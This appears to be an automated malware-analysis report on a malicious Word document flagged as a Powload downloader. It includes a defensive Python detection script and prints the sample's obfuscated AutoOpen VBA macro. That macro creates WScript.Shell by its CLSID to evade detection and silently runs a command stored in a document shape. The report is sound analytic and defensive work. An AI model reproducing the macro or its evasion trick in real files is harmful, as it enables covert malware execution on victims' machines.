Verdict: MALICIOUS
Risk score: 252

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic); T1203 (Exploitation for Client Execution). Note that the findings below show a VBA AutoOpen macro, which runs only once macros are enabled, and no parser exploit; the T1203 mapping comes from the analyzer's tagging, not from evidence on this page.
The sample fires a critical heuristic for instantiating a dangerous COM class via VBA: GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") resolves the CLSID of WScript.Shell directly, so the usual CreateObject("WScript.Shell") ProgID string never appears in the macro text. A second, high-severity heuristic matched a cmd.exe invocation with an execution flag. The AutoOpen macro is present and heavily obfuscated: every real statement is padded with Select Case blocks on undefined variables, junk arithmetic and repeated On Error Resume Next. Only four statements do work: the macro takes a handle to a document shape (Shapes("BJcpJnozUIw")), concatenates that shape's text (SvVKl.TextFrame.TextRange.Text) with a set of empty variables into the command string knNwZmwi, creates the WScript.Shell object, and calls its Run method with window style 0, i.e. hidden. The command line itself is therefore stored in the document body rather than in the VBA, which is why the macro preview contains no cmd.exe literal. The ClamAV detection 'Doc.Downloader.Powload-6770633-0' and the hidden-window execution of a document-sourced command are consistent with a downloader that fetches and executes a second-stage payload; the payload is not shown in this report.
Heuristics (9)

- ClamAV: Doc.Downloader.Powload-6770633-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Powload-6770633-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings). Document contains VBA macro code.
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS). VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. {72C24DD5-D70A-438B-8A42-98424B88AFB8} is the CLSID of WScript.Shell. Matched lines in script:
  UDBXZHrlN = 210955916 + CByte(phnEV - Sqr(iAKszvfVr)) * RQkVTZEE - atvQoiBv * kKEUq / CDate(287462199) * 330932111 * 262098934 / (95403459 - Sin(26986904))
  Set KHwDwckDO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
  On Error Resume Next
- GetObject call (high, OLE_VBA_GETOBJ). Matched the same three lines as the CLSID finding above.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched lines in script:
  Attribute VB_Customizable = True
  Sub AutoOpen()
  On Error Resume Next
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD). The matched string is not reproduced in this report. The macro preview below contains no cmd.exe literal, so the match is against content outside the VBA text, consistent with the shape text the macro concatenates into its command line at run time.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The heuristic's description states that no modern VBA project was recovered, but this analysis did recover one (macros.bas, below), so treat this finding as redundant with OLE_VBA_AUTOOPEN rather than as independent evidence. It is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). The URL itself is not a detection; the per-URL label records which channel (macro, JS, link annotation, document body, ...) reached it. This one is the DrawingML XML namespace identifier that Office writes into its own markup, not a host the document contacts, and should not be treated as an indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10639 bytes | f4a137dd333a87ad5646cf6c395099b84b2a116c5ccf0ffbfaa4fcd3e3e0c187 |

Detection for macros.bas:

- ClamAV: No threats found. The Powload signature above fired on the parent document, not on the decoded VBA source, so the absence of a hit here does not contradict the document-level detection.
- Obfuscation or payload: likely. 186 of 273 identifiers look randomly generated (e.g. 'BJcpJnozUIw'), consistent with name-mangling obfuscation.
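The two static checks that carry this report, the CLSID-keyed GetObject detection and the "186 of 273 identifiers look randomly generated" name-mangling score, plus a check for the command line being sourced from a document shape, as an added example in Python. This is not the analyzer's own code. It assumes a CLSID table (only the WScript.Shell entry is taken from the page; the Shell.Application and Scripting.FileSystemObject entries are public CLSIDs added for coverage), randomness thresholds chosen for illustration, and a constructed excerpt of the macro shown below with the junk arithmetic removed and two ordinary identifiers added so the ratio has something to discriminate.

```python
"""Static triage of decoded VBA: CLSID-based COM instantiation, identifier
name-mangling ratio, and detection of a command line read from a shape."""
from __future__ import annotations
import re

# Added example, not the analyzer's code. WScript.Shell is the CLSID on the
# page; the other two are public CLSIDs added as an assumption for coverage.
DANGEROUS_CLSIDS = {
    "72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell",
    "13709620-C279-11CE-A49E-444553540000": "Shell.Application",
    "0D43FE01-F093-11CF-8940-00A0C9054228": "Scripting.FileSystemObject",
}

CLSID = r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}"
# GetObject("new:{CLSID}") with or without braces. CreateObject("ProgID") is
# deliberately not matched: that is the name-based path this check complements.
GETOBJECT_NEW = re.compile(r'GetObject\s*\(\s*"new:\{?(' + CLSID + r')\}?"', re.I)
STRING_LITERAL = re.compile(r'"[^"\n]*"')
IDENT = re.compile(r"(?<![.\w])[A-Za-z_]\w*")      # skips members after '.'
SHAPE_TEXT = re.compile(r"\.TextFrame\.TextRange\.Text\b", re.I)
VOWELS = set("aeiou")

# VBA keywords, built-ins and object-model names never scored as user-chosen
# identifiers (a partial list; extend as needed).
KNOWN_NAMES = {w.lower() for w in """
Attribute Sub Function End If Then Else ElseIf Select Case Dim Const Set Let As
On Error Resume Next GoTo Exit For Each In To Step While Wend Do Loop Until
True False Nothing Null Empty Integer Long String Variant Boolean Double Object
AutoOpen Document_Open Auto_Open Shapes ActiveDocument ThisDocument GetObject
CreateObject ChrW Chr CDate CByte CInt CStr Sqr Sin Len Mid Environ Shell MsgBox
""".split()}


def find_clsid_instantiations(vba: str) -> list[tuple[str, str]]:
    """Each GetObject("new:...") CLSID with its class name, or 'unknown' when
    the CLSID is not in the table (still worth an analyst's look)."""
    hits = []
    for m in GETOBJECT_NEW.finditer(vba):
        clsid = m.group(1).upper()
        hits.append((clsid, DANGEROUS_CLSIDS.get(clsid, "unknown")))
    return hits


def looks_random(name: str) -> bool:
    """Name-mangling heuristic: handles like 'BJcpJnozUIw' flip letter case far
    more often than human camelCase and often have almost no vowels.
    The thresholds (4 case flips, vowel ratio below 0.15) are assumptions."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 5:
        return False
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    vowel_ratio = sum(c.lower() in VOWELS for c in letters) / len(letters)
    return flips >= 4 or vowel_ratio < 0.15


def user_identifiers(vba: str) -> list[str]:
    """Unique user-chosen identifiers in order of first appearance. String
    literals are blanked first so words inside them are not scored."""
    code = STRING_LITERAL.sub('""', vba)
    seen: list[str] = []
    for tok in IDENT.findall(code):
        if tok.lower() in KNOWN_NAMES or tok.upper().startswith("VB_"):
            continue
        if tok not in seen:
            seen.append(tok)
    return seen


def mangling_ratio(vba: str) -> tuple[int, int]:
    """(random-looking identifiers, total identifiers): the '186 of 273' figure."""
    names = user_identifiers(vba)
    return sum(looks_random(n) for n in names), len(names)


def command_from_shape(vba: str) -> bool:
    """True when the macro reads a shape's text: the command line then lives in
    the document body, not in the VBA, so string scans of the macro miss it."""
    return bool(SHAPE_TEXT.search(vba))


# Constructed excerpt of the macro on this page (junk arithmetic removed,
# retryCount and userName added as ordinary, non-mangled identifiers).
SAMPLE_VBA = '''Attribute VB_Name = "ukAOzli"
Sub AutoOpen()
On Error Resume Next
Dim retryCount As Integer
retryCount = retryCount + 1
Set SvVKl = Shapes("BJcpJnozUIw")
knNwZmwi = "" + IYmASkF + SvVKl.TextFrame.TextRange.Text + jOiHhB
Set KHwDwckDO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
Const jwpVzajEwiI = 0
KHwDwckDO.Run knNwZmwi, jwpVzajEwiI
userName = Environ("USERNAME")
End Sub
'''

if __name__ == "__main__":
    print("CLSID instantiations:", find_clsid_instantiations(SAMPLE_VBA))
    print("mangled identifiers (random, total):", mangling_ratio(SAMPLE_VBA))
    print("command sourced from document shape:", command_from_shape(SAMPLE_VBA))
```

The CLSID check is the point of the OLE_VBA_GETOBJECT_CLSID_DANGEROUS heuristic: a rule keyed on the string "WScript.Shell" never sees this macro, so the lookup has to be on the GUID. The shape check is why the command line is absent from the preview; to recover it you need the text of the shape named in Shapes(...), which lives in the document body, not in macros.bas.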
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ukAOzli"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case QqGtA
Case 207479976
VlrZSE = 299451022
OtHVAF = dWLLzb
IjjMawl = 106745835
Case 107898840
vDuOdH = ChrW(93024130)
mhFDV = CDate(195219158)
wANkip = 211030311
End Select
tcLtGdwjw = 192601230 + CByte(awKBzOwJM - Sqr(WEKCCdwYj)) * YPLBlSOI - qBGabDN * zNVljTzW / CDate(158035072) * 2226809 * 281762672 / (25683830 - Sin(340286475))
On Error Resume Next
Select Case ArwIvkR
Case 338631635
wDfzkiM = 72369984
wjszESpc = irCvDz
HtBJibF = 190152885
Case 189045435
IHjii = ChrW(199161488)
wBQiDnfT = CDate(127773702)
mHZAAfZ = 191142474
End Select
LBAWiPUz = 62614654 + CByte(wjzNTzBj - Sqr(EFVqOESVC)) * IcGBt - hvfmSi * WmWnnuGAw / CDate(318811003) * 230042775 * 162051587 / (209649273 - Sin(276687884))
Set SvVKl = Shapes("BJcpJnozUIw")
On Error Resume Next
Select Case FiGJQh
Case 288977756
jRQjclJ = 148076343
lddloddSM = NwikEEW
tilquXtzk = 266433336
Case 27956869
iXwlEVhhQ = ChrW(6498867)
rDLiiwj = CDate(75445542)
FvQsGuj = 34385337
End Select
qtoNSopzw = 213291609 + CByte(WpYsAumj - Sqr(PzDdcpmHG)) * JmcoZHo - lXojBAb * PXYrM / CDate(54341683) * 341753871 * 78460309 / (192504251 - Sin(287886649))
On Error Resume Next
Select Case zHzcO
Case 170116777
COckLjw = 183115602
cGMOOdqzz = EZUBfoQnw
fidCzhSr = 79001614
Case 237505932
IitolD = ChrW(298629480)
TRAfPVDh = CDate(84578013)
wusBvUwcJ = 96865586
End Select
KwnNivva = 86018884 + CByte(lXzcOfwOh - Sqr(zFuPpYHiZ)) * ItiHITMSh - IHzCKXt * jpzOcSh / CDate(32776549) * 24001710 * 154392063 / (155105048 - Sin(64053165))
On Error Resume Next
Select Case KOYnfwG
Case 266083784
uumKN = 24655143
wbzVLdpQ = jXtpzs
aXNKrv = 237847499
Case 142496010
zJQnfSiEi = ChrW(52666106)
jHShZH = CDate(138690383)
YNwJCjMmA = 296866895
End Select
CribNUYcm = 106963144 + CByte(oGpfdSFfl - Sqr(aowjzzOH)) * fiLnFW - jENBi * fjYrTXCt / CDate(222129276) * 136328655 * 52533149 / (78930502 - Sin(183651928))
knNwZmwi = "" + IYmASkF + OUJVTkOd + QHHfr + wJDbdS + SvVKl.TextFrame.TextRange.Text + jOiHhB + qsrIPvR + jvQmH
On Error Resume Next
Select Case QqlTE
Case 13691448
fLDsK = 240126674
sWBKKXKR = HULdk
IUQrsaJiC = 86387499
Case 132090265
pYIiZT = ChrW(132381350)
PHFllzzhd = CDate(336713111)
YYnDicSrG = 233569995
End Select
zzqIUszY = 307663023 + CByte(JldBOfFvb - Sqr(FDUvqCV)) * GGcNObH - uccGi * EBPmK / CDate(9445290) * 130222222 * 322766912 / (85313016 - Sin(316452082))
On Error Resume Next
Select Case XbfKG
Case 229550800
aXsoqa = 138761056
uYNTsBbXT = GClqE
GwLtjA = 66764012
Case 261452801
qXLKkBvo = ChrW(109808961)
HODlFvE = CDate(75649913)
zffkT = 164590768
End Select
uPbQuNZf = 16229267 + CByte(PMiCLOV - Sqr(wFCKFz)) * oDoIKns - CHfNAjtp * jbjrcDn / CDate(114995652) * 71103498 * 132878537 / (148692652 - Sin(131476834))
On Error Resume Next
Select Case MjdKPh
Case 324258949
POaDS = 59726801
jMQHiZkSI = jOihLoiM
wJCYrLOWj = 315380887
Case 232992266
rdVBHwB = ChrW(165059207)
bQUXjTOb = CDate(26793207)
rrZMkjo = 166230317
End Select
UDBXZHrlN = 210955916 + CByte(phnEV - Sqr(iAKszvfVr)) * RQkVTZEE - atvQoiBv * kKEUq / CDate(287462199) * 330932111 * 262098934 / (95403459 - Sin(26986904))
Set KHwDwckDO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
On Error Resume Next
Select Case PBiPMJW
Case 273881768
wOsbtiYdX = 241284956
hSpjzJsMv = zGANoYZ
lnsJq = 148203443
Case 187634844
Zzaoj = ChrW(178687480)
zrzLBRD = CDate(111538328)
uWwHs = 87770190
End Select
FwZmz = 1811300 + CByte(cSEnjul - Sqr(rYcAV)) * MXlhWiPUZ - RMtUpK * jzUUszdT / CDate(146672095) * 158697408 * 266175597 / (206497103 - Sin(159619851))
On Error Resume Next
Select Case GTzzHQudM
Case 313537263
XGoDipYt = 217449229
kFDKRFc = brBVDum
poiiwdf = 108967385
Case 106092274
PGOzKiYP = ChrW(143443694)
vnpKSH = CDate(240142883)
hCDuQ = 86339930
End Select
kPwcHZnuf = 278259890 + CByte(IihXwnY - Sqr(ZCwTQrt)) * jNiUpBz - PZnOoIt * UvwGW / CDate(63763719) * 37667098 * 104100602 / (148367102 - Sin(293987940))
On Error Resume Next
Select Case HYwniqp
Case 273393421
BfraHhT = 289582338
wDToBKArT = JULARiDC
NGjfrCMqr = 199418622
Case 172197406
tHULsBS = ChrW(147140370)
nrXAfEqf = CDate(169150993)
EicinMYcm = 272326300
End Select
JMtKPM = 281274782 + CByte(ZdkjDaOM - Sqr(LzVLSiV)) * RdjzU - jjSdiip * sApAST / CDate(329469683) * 166520167 * 28896879 / (164722352 - Sin(1103234))
On Error Resume Next
Select Case fRJqz
Case 317260428
PwoHoR = 29145921
iwoZOV = GKCrd
LmbJjbIiw = 206475133
Case 140998007
CmDDQSh = ChrW(150352547)
JOUNlkYK = CDate(330711729)
ISQDMNwF = 276440469
End Select
pmTSEMjDC = 303491783 + CByte(KGICXGww - Sqr(kTwsMClir)) * SNrbwXvBJ - AVIEDwM * BoGCG / CDate(334052246) * 73689809 * 141895035 / (264502370 - Sin(178337277))
On Error Resume Next
Select Case HpPAmdu
Case 237100931
FEbzrpHa = 268183957
waPQQ = MwdALbSGO
QcMJlTo = 320990399
Case 63199282
FYJGkk = ChrW(97671471)
zvsYwBZj = CDate(108427481)
bdlUiWZi = 89482616
End Select
WclSHAtn = 259537524 + CByte(QaMiJTc - Sqr(iLjECFUfi)) * pnhGXjNU - ZRzHl * tTAQDLPth / CDate(1049347) * 16408803 * 314279488 / (121056263 - Sin(171274524))
Const jwpVzajEwiI = 0
On Error Resume Next
Select Case GKuFH
Case 149585934
wCmYGTjMv = 18810428
DpzRsf = zlbNvOT
ndPCUJnPb = 313275651
Case 105972853
bTrnc = ChrW(248453575)
ZpKoRPaJ = CDate(248136385)
iHXFJj = 21510892
End Select
siLQaXWcb = 20744940 + CByte(tnlJftH - Sqr(pwntzBw)) * nszRmoqjD - JOnRonX * rizwsLC / CDate(21162044) * 92264774 * 333237460 / (35697190 - Sin(267348103))
On Error Resume Next
Select Case jwfrI
Case 168108317
JDrPPz = 176677001
nQbKlvraH = DiAHwFfV
RZdJhjIO = 56432167
Case 254051211
fOmdqFlmS = ChrW(75215942)
YYEFuKCH = CDate(247762787)
tIJXKGtd = 192019402
End Select
inPHosWR = 282913251 + CByte(tDdcBE - Sqr(cmzLB)) * JmGcG - wrIpiFkJ * QColQRpqi / CDate(213955476) * 148378738 * 39480446 / (11448632 - Sin(115557953))
On Error Resume Next
Select Case wJumr
Case 79490895
UJcLPaOjw = 48060064
fZrFP = IjIdKp
AZkUToiE = 312159033
Case 13175631
ATQQEST = ChrW(170094731)
skHQq = CDate(301975105)
iIDTJTt = 77017648
End Select
quMHZFjXM = 34553900 + CByte(BripKkkqQ - Sqr(TdZMEv)) * iUjaEaNXG - jnAjEl * amdOIYjCv / CDate(165209733) * 155917143 * 115002528 / (257744718 - Sin(309065409))
KHwDwckDO.Run@ knNwZmwi, jwpVzajEwiI
On Error Resume Next
Select Case TEYbtTKp
Case 56244423
skEjlXnf = 320215791
UXDiaS = QPobMqnqL
KwEwfB = 236371283
Case 245646509
RacASIVrV = ChrW(321195658)
pAbWt = CDate(175714192)
EftRpZ = 60580020
End Select
jsWoVTz = 179606579 + CByte(WoOWS - Sqr(wStKYKXiD)) * hfFFz - DrpcdUjb * sZazFMzm / CDate(263825522) * 308428506 * 332966488 / (316605852 - Sin(96201009))
On Error Resume Next
Select Case EXLJoUOEv
Case 119584602
iREvJ = 196998000
jbINaSJi = nvqGj
OFdkCAjA = 244618140
Case 152930369
cHsXq = ChrW(330019154)
hvojrwt = CDate(342044482)
PbJFL = 129447707
End Select
DzSYbkzbX = 275420634 + CByte(qCqhwzR - Sqr(oufOjrC)) * UYbSoILoY - ZzzwNLB * DzPhiMn / CDate(254913395) * 206584977 * 8754585 / (160014467 - Sin(246573680))
On Error Resume Next
Select Case ZQMikFiKb
Case 148419186
CvaKzzvQK = 146293795
codlfhYVb = Tzruo
DBoJri = 42754228
Case 249235358
atZQZZFZi = ChrW(265558227)
AzaAlGu = CDate(259320132)
wiQLmrPW = 86496785
End Select
ziroE = 262025541 + CByte(ECiOXNFQJ - Sqr(anXkk)) * CzscNi - JjMZqpJL * NlBrJUa / CDate(135159969) * 70347871 * 304511946 / (186731742 - Sin(261176749))
On Error Resume Next
Select Case uiJEkVF
Case 45323015
osSZbz = 206892295
hmAfWzXl = VUrIq
AZwmqSW = 49778636
Case 138913993
GTJhBu = ChrW(274742262)
bzJSwY = CDate(247386274)
SbzkOHwV = 115740286
End Select
dMpVLifRP = 194654855 + CByte(DHbfhj - Sqr(NidZAEzuI)) * wwVnQCRd - GoimiII * PTYFhbG / CDate(53891224) * 231923011 * 142238564 / (22203487 - Sin(76883465))
On Error Resume Next
Select Case FMitkrVIf
Case 33761359
qvpIjoF = 273187723
hXjzwOKG = jDYwVpX
pSSQiGc = 159610001
Case 11817999
lAjCjQjJh = ChrW(190621806)
zWjOlwBz = CDate(308245926)
AlGwmWS = 19229902
End Select
HbuYZF = 277391457 + CByte(UIMMHuss - Sqr(mCtKaYGQl)) * aEwtQG - VGCzGI * PhrhNsqNF / CDate(278404705) * 237001508 * 108111729 / (63286372 - Sin(35981281))
End Sub